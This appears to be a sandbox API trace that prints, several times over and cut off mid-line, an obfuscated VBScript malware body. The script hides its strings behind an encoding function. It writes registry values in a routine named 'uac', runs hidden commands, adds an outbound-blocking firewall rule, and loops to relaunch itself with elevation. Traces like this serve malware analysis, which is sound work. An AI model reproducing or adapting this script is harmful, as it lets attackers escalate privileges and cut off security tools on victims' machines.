bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.974] wcsncmp (_String1="\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0222.974] wcsncmp (_String1="\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.974] wcsncmp (_String1="\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.974] wcsncmp (_String1="\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 